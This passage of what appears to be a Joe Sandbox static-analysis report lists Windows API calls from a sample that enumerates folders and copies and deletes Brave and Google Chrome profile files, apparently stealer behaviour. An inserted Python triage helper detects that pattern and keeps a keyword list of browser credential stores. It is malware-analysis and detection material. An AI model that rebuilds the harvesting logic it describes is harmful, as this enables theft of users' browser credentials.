                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A1F9F
                          • lstrlen.KERNEL32(00F290B8), ref: 003A1FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 003A1FE3
                          • lstrlen.KERNEL32(003D1794), ref: 003A1FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A200E
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A2042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A204D
                          • lstrlen.KERNEL32(003D1794), ref: 003A2058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2075
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A2081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                          • String ID: \*.*
                          • API String ID: 4127656590-1173974218
                          • Opcode ID: 07539751e9183458e7e904b7b1cdd54a7ae6ea3ceda46875d0fe63be724a2d43
                          • Instruction ID: 9c2161926dfd35d7bc17b86db96affca19e3514023847a9b34dd6fb9fcf152ad
                          • Opcode Fuzzy Hash: 07539751e9183458e7e904b7b1cdd54a7ae6ea3ceda46875d0fe63be724a2d43
                          • Instruction Fuzzy Hash: 8D926571A112169BCB33EFA8DD88AAF77B9EF56700F05412AF805AB251DB34DD05CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADBEF
                          • lstrlen.KERNEL32(003D4CA8), ref: 003ADBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADC17
                          • lstrcat.KERNEL32(00000000,003D4CA8), ref: 003ADC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADC4C
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADC8F
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003ADCD0
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003ADCF0
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003ADD0A
                          • lstrlen.KERNEL32(003CCFEC), ref: 003ADD1D
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADD7B
                          • lstrlen.KERNEL32(003D1794), ref: 003ADD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADDA3
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADDAF
                          • lstrlen.KERNEL32(?), ref: 003ADDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 003ADDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADE19
                          • lstrlen.KERNEL32(003D1794), ref: 003ADE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003ADE6F
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADE7B
                          • lstrlen.KERNEL32(00F29408), ref: 003ADE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADEBB
                          • lstrlen.KERNEL32(003D1794), ref: 003ADEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 003ADEE6
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADEF2
                          • lstrlen.KERNEL32(00F290F8), ref: 003ADF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADFA5
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADFB1
                          • lstrlen.KERNEL32(00F29408), ref: 003ADFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADFF4
                          • lstrlen.KERNEL32(003D1794), ref: 003ADFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE022
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003AE02E
                          • lstrlen.KERNEL32(00F290F8), ref: 003AE03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003AE06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 003AE0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 003AE0E7
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003AE11F
                          • lstrlen.KERNEL32(00F2D6C0), ref: 003AE12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE155
                          • lstrcat.KERNEL32(00000000,?), ref: 003AE15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE19F
                          • lstrcat.KERNEL32(00000000), ref: 003AE1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 003AE1F9
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003AE22F
                          • lstrlen.KERNEL32(00F290B8), ref: 003AE23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE261
                          • lstrcat.KERNEL32(00000000,00F290B8), ref: 003AE269
                          • lstrlen.KERNEL32(\Brave\Preferences), ref: 003AE274
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE29B
                          • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 003AE2A7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE2CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE30F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE349
                          • DeleteFileA.KERNEL32(?), ref: 003AE381
                          • StrCmpCA.SHLWAPI(?,00F2D720), ref: 003AE3AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE3F4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE41C
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE445
                          • StrCmpCA.SHLWAPI(?,00F290F8), ref: 003AE468
                          • StrCmpCA.SHLWAPI(?,00F29408), ref: 003AE47D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE4D9
                          • GetFileAttributesA.KERNEL32(00000000), ref: 003AE4E0
                          • StrCmpCA.SHLWAPI(?,00F2D738), ref: 003AE58E
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003AE5C4
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 003AE639
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE678
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE6A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE6C7
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE70E
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE737
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE75C
                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 003AE776
                          • DeleteFileA.KERNEL32(?), ref: 003AE7D2
                          • StrCmpCA.SHLWAPI(?,00F29238), ref: 003AE7FC
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE88C
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE8B5
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE8EE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE916
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 2635522530-726946144
                          • Opcode ID: 226bd6821e70c9657015f19a05eae685b7672eb63e696ea69b6693bb2df57440
                          • Instruction ID: a2842361c97d2b94a7132114974c4310d2f6617600abba8d887180317136ca29
                          • Opcode Fuzzy Hash: 226bd6821e70c9657015f19a05eae685b7672eb63e696ea69b6693bb2df57440
                          • Instruction Fuzzy Hash: 0692A071A112169BCB22EFB8DC89AAF77B9EF56300F05452AF806DB251DB34DC45CB90
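Analyst note (added example, not part of the Joe Sandbox report or of the sample's own code). The two function listings above follow the same shape: a path is assembled with lstrcpy/lstrcat, FindFirstFileA enumerates a directory, every entry is checked with two StrCmpCA calls (the operands are only shown as the addresses 003D17A0 and 003D17A4; that they are "." and ".." is the usual pattern, but an assumption here), and then CopyFileA(…, …, 1) copies candidate files out and DeleteFileA removes them, with "Brave", "Google Chrome", "Preferences" and "\Brave\Preferences" as the comparison strings. The earlier function resolves its root via SHGetFolderPathA with CSIDL 0x1C. The helper below parses API lines exactly as the IDA plugin prints them, lists the string literals, decodes the CSIDL argument, and flags the enumerate-then-copy-then-delete sequence against browser profile strings. The sample excerpt is constructed by merging the SHGetFolderPathA subcall line from the earlier function with lines of the Brave/Chrome function; the CSIDL table holds the standard Shell32 constants, and BROWSER_KEYWORDS beyond the three strings visible on the page are an analyst choice, not something the report states.

```python
"""Triage helper for Joe Sandbox IDA plugin 'APIs' listings.

Added example; not part of the report or the sample. Parses the per-function
API call lines, extracts string-literal arguments, decodes SHGetFolderPathA's
CSIDL, and flags the FindFirstFileA -> CopyFileA -> DeleteFileA sequence
combined with browser profile strings.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# One call per line as the report prints it. Handles the optional
# "Part of subcall function XXXXXXXX:" prefix and the bare
# "wsprintfA.USER32 ref: ..." form that carries no argument list.
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
_HEX = re.compile(r"^[0-9A-F]{8}$")  # an address/handle, not a string literal

# Standard Shell32 CSIDL values (2nd argument of SHGetFolderPathA).
CSIDL = {
    0x05: "CSIDL_PERSONAL (Documents)", 0x10: "CSIDL_DESKTOPDIRECTORY",
    0x1A: "CSIDL_APPDATA (Roaming)", 0x1C: "CSIDL_LOCAL_APPDATA",
    0x23: "CSIDL_COMMON_APPDATA (ProgramData)", 0x26: "CSIDL_PROGRAM_FILES",
    0x28: "CSIDL_PROFILE",
}
# Analyst-chosen (assumption): only Brave, Google Chrome and Preferences are
# literally visible in this report; the rest are common stealer targets.
BROWSER_KEYWORDS = ("Brave", "Google Chrome", "Preferences", "Login Data",
                    "Cookies", "Web Data", "Local State")

# Constructed excerpt: the SHGetFolderPathA subcall line from the earlier
# function plus lines of the Brave/Chrome function, copied from the report.
SAMPLE_EXCERPT = r"""
APIs
  • Part of subcall function 003C4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 003C406D
• lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADBC1
• FindFirstFileA.KERNEL32(00000000,?), ref: 003ADCD0
• StrCmpCA.SHLWAPI(?,003D17A0), ref: 003ADCF0
• StrCmpCA.SHLWAPI(?,003D17A4), ref: 003ADD0A
• StrCmpCA.SHLWAPI(?,Brave), ref: 003AE0CD
• StrCmpCA.SHLWAPI(?,Preferences), ref: 003AE0E7
• CopyFileA.KERNEL32(00000000,?,00000001), ref: 003AE1F9
• lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 003AE2A7
• DeleteFileA.KERNEL32(?), ref: 003AE381
• GetFileAttributesA.KERNEL32(00000000), ref: 003AE4E0
• CopyFileA.KERNEL32(00000000,?,00000001), ref: 003AE639
• StrCmpCA.SHLWAPI(?,Google Chrome), ref: 003AE776
• DeleteFileA.KERNEL32(?), ref: 003AE7D2
Strings
"""


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int
    subcall: Optional[int] = None

    def literals(self) -> List[str]:
        """Arguments that are neither an 8-hex-digit address nor '?'."""
        return [a for a in self.args if a != "?" and not _HEX.match(a)]


def parse_trace(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue  # 'APIs' / 'Strings' headings and blank lines
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        sub = m.group("sub")
        calls.append(Call(m.group("api"), m.group("mod"), args,
                          int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def literal_strings(calls: List[Call]) -> List[str]:
    """Distinct string literals in first-seen order."""
    out: List[str] = []
    for c in calls:
        out.extend(s for s in c.literals() if s not in out)
    return out


def decode_csidl(calls: List[Call]) -> List[str]:
    """Name the folder each SHGetFolderPathA resolves (low byte = CSIDL)."""
    return [CSIDL.get(int(c.args[1], 16) & 0xFF, "CSIDL 0x%02X" % (int(c.args[1], 16) & 0xFF))
            for c in calls
            if c.api == "SHGetFolderPathA" and len(c.args) > 1 and _HEX.match(c.args[1])]


def file_ops(calls: List[Call]) -> List[tuple]:
    """(ref, api, literals) for file-system calls, in address order."""
    ops = ("FindFirstFileA", "GetFileAttributesA", "CopyFileA", "DeleteFileA")
    return sorted((c.ref, c.api, c.literals()) for c in calls if c.api in ops)


def flag_browser_harvest(calls: List[Call]) -> dict:
    """Enumerate a directory, copy files out, delete the copies, with browser
    profile strings in the same function: the stealer pattern shown above."""
    first = {api: ref for ref, api, _ in reversed(file_ops(calls))}  # lowest ref per API
    lits = literal_strings(calls)
    keywords = [k for k in BROWSER_KEYWORDS if any(k in s for s in lits)]
    enum_then_copy = ("FindFirstFileA" in first and "CopyFileA" in first
                      and first["FindFirstFileA"] < first["CopyFileA"])
    return {
        "enumerate_then_copy": enum_then_copy,
        "deletes_after_copy": "DeleteFileA" in first and first.get("CopyFileA", 0) < first["DeleteFileA"],
        # CopyFileA's 3rd argument is bFailIfExists; the report shows 00000001 (TRUE)
        "copy_fails_if_exists": any(c.api == "CopyFileA" and c.args[-1:] == ["00000001"] for c in calls),
        "browser_keywords": keywords,
        "suspicious": enum_then_copy and bool(keywords),
    }


if __name__ == "__main__":
    parsed = parse_trace(SAMPLE_EXCERPT)
    print("literals:", literal_strings(parsed))
    print("folders:", decode_csidl(parsed))
    print("file ops:", [(hex(r), a) for r, a, _ in file_ops(parsed)])
    print("verdict:", flag_browser_harvest(parsed))
```

Run against a pasted "APIs" block; the refs are the in-function addresses the plugin prints, so ordering by ref gives the static order of the calls, which is what the enumerate-then-copy check relies on.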
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B18D2
                          • lstrlen.KERNEL32(\*.*), ref: 003B18DD
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B18FF
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 003B190B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1932
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003B1947
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003B1967
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003B1981
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B19BF
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B19F2
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B1A1A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B1A25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A4C
                          • lstrlen.KERNEL32(003D1794), ref: 003B1A5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A80
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1AB4
                          • lstrlen.KERNEL32(?), ref: 003B1AC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1AE5
                          • lstrcat.KERNEL32(00000000,?), ref: 003B1AF3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1B19
                          • lstrlen.KERNEL32(00F29248), ref: 003B1B2F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1B59
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B1B64
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1B8F
                          • lstrlen.KERNEL32(003D1794), ref: 003B1BA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1BC3
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1BCF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1BF8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1C25
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B1C30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1C57
                          • lstrlen.KERNEL32(003D1794), ref: 003B1C69
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1C8B
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1C97
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1CC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1CEF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B1CFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1D21
                          • lstrlen.KERNEL32(003D1794), ref: 003B1D33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1D55
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1D61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1D8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1DB9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B1DC4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1DED
                          • lstrlen.KERNEL32(003D1794), ref: 003B1E19
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1E36
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1E42
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1E68
                          • lstrlen.KERNEL32(00F2D828), ref: 003B1E7E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1EB2
                          • lstrlen.KERNEL32(003D1794), ref: 003B1EC6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1EE3
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1EEF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1F15
                          • lstrlen.KERNEL32(00F2DA60), ref: 003B1F2B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1F5F
                          • lstrlen.KERNEL32(003D1794), ref: 003B1F73
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1F90
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1F9C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1FC2
                          • lstrlen.KERNEL32(00F1A5D0), ref: 003B1FD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2000
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B200B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2036
                          • lstrlen.KERNEL32(003D1794), ref: 003B2048
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2067
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B2073
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2098
                          • lstrlen.KERNEL32(?), ref: 003B20AC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B20D0
                          • lstrcat.KERNEL32(00000000,?), ref: 003B20DE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2103
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B213F
                          • lstrlen.KERNEL32(00F2D6C0), ref: 003B214E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2176
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B2181
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                          • String ID: \*.*
                          • API String ID: 712834838-1173974218
                          • Opcode ID: 9cdab0b23963e2a8fd052231b04490e0a10faf7a2c23f7ec8cddf118e912ac8e
                          • Instruction ID: 5de9644e7d411cb8d4497d11014dffc0727453a90077c2d89030d604eeacd935
                          • Opcode Fuzzy Hash: 9cdab0b23963e2a8fd052231b04490e0a10faf7a2c23f7ec8cddf118e912ac8e
                          • Instruction Fuzzy Hash: A5629E31A12216ABCB23AF68DC48AEF77B9EF51704F45012AF9059BA61DB34DD05CB90
                          APIs
                          • wsprintfA.USER32 ref: 003B392C
                          • FindFirstFileA.KERNEL32(?,?), ref: 003B3943
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003B396C
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003B3986
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B39BF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B39E7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B39F2
                          • lstrlen.KERNEL32(003D1794), ref: 003B39FD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3A1A
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B3A26
                          • lstrlen.KERNEL32(?), ref: 003B3A33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3A53
                          • lstrcat.KERNEL32(00000000,?), ref: 003B3A61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3A8A
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B3ACE
                          • lstrlen.KERNEL32(?), ref: 003B3AD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3B05
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B3B10
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3B36
                          • lstrlen.KERNEL32(003D1794), ref: 003B3B48
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3B6A
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B3B76
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3B9E
                          • lstrlen.KERNEL32(?), ref: 003B3BB2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3BD2
                          • lstrcat.KERNEL32(00000000,?), ref: 003B3BE0
                          • lstrlen.KERNEL32(00F290B8), ref: 003B3C0B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3C31
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B3C3C
                          • lstrlen.KERNEL32(00F29248), ref: 003B3C5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3C84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B3C8F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3CB7
                          • lstrlen.KERNEL32(003D1794), ref: 003B3CC9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3CE8
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B3CF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3D1A
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B3D47
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B3D52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3D79
                          • lstrlen.KERNEL32(003D1794), ref: 003B3D8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3DAD
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B3DB9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3DE2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3E11
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B3E1C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3E43
                          • lstrlen.KERNEL32(003D1794), ref: 003B3E55
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3E77
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B3E83
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3EAC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3EDB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B3EE6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3F0D
                          • lstrlen.KERNEL32(003D1794), ref: 003B3F1F
